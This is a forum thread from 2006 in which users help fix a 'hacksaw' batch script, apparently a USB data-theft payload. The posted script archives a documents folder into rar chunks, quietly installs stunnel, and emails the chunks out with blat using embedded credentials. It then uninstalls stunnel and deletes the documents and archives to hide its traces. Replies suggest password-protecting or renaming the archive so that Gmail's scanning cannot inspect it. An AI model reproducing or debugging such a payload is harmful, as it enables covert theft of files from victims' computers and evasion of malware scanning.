DLSS Posted November 3, 2006 Share Posted November 3, 2006 ok this is a problem i cnat seem to get fixed with the hacksaw .... i recieve the r00 files fine but dont recieve the rar file ..... and without the rar file u cant open the r00 (well u can but its incomplete ...) Quote Link to comment Share on other sites More sharing options...
pseudobreed Posted November 3, 2006 Share Posted November 3, 2006 You are going to have to paste the code that you use here for anyone to be able to help you. Quote Link to comment Share on other sites More sharing options...
DLSS Posted November 3, 2006 Author Share Posted November 3, 2006 just the standard one with a lil subject add on ... :: Configure Email Options SET emailfrom=blablah@blahblah.blah SET emailto=blablah@blahblah.blah SET password=blahblahblah SET subj="%COMPUTERNAME% %USERNAME% %DATE%" :: Archive documents in 1MB chunks rar a goodies.rar .docs -v1024k -vn stunnel-4.11.exe -install -quiet net start stunnel GOTO sendfiles :cleanup :: Stop stunnel rem taskkill /f /im stunnel-4.11.exe (??) net stop stunnel stunnel-4.11.exe -uninstall -quiet :: Delete documents rmdir /s /q docs :: Delete archive del /q /f goodies*.* GOTO end :sendfiles for %%i in (goodies.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -s %subj% -server 127.0.0.1:1099 GOTO cleanup :end Quote Link to comment Share on other sites More sharing options...
pseudobreed Posted November 3, 2006 Share Posted November 3, 2006 I didnt test it, but it looks fine. My only other theory now would be that gmail knows a .rar file is an archive and their antivirus checks archives. If for some reason there is a virus or something gmail does not like in the .rar file then it will not allow it to be sent. The only way around that is to rename the file extension to something gmail does not know. Quote Link to comment Share on other sites More sharing options...
Sparda Posted November 3, 2006 Share Posted November 3, 2006 Thats why you should password the archive, this prevents google from scanning it and, for that matter, looking at the contents. Quote Link to comment Share on other sites More sharing options...
DLSS Posted November 3, 2006 Author Share Posted November 3, 2006 that isnt the problem .... all the test archives contain is images , but it doesnt send me teh rar file Quote Link to comment Share on other sites More sharing options...
pseudobreed Posted November 3, 2006 Share Posted November 3, 2006 Then for giggles, take out the subject line. Blat freaks out if the subject line or body has a space in it and you dont use quotes correctly. And using quotes in batch is a very tricky thing. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.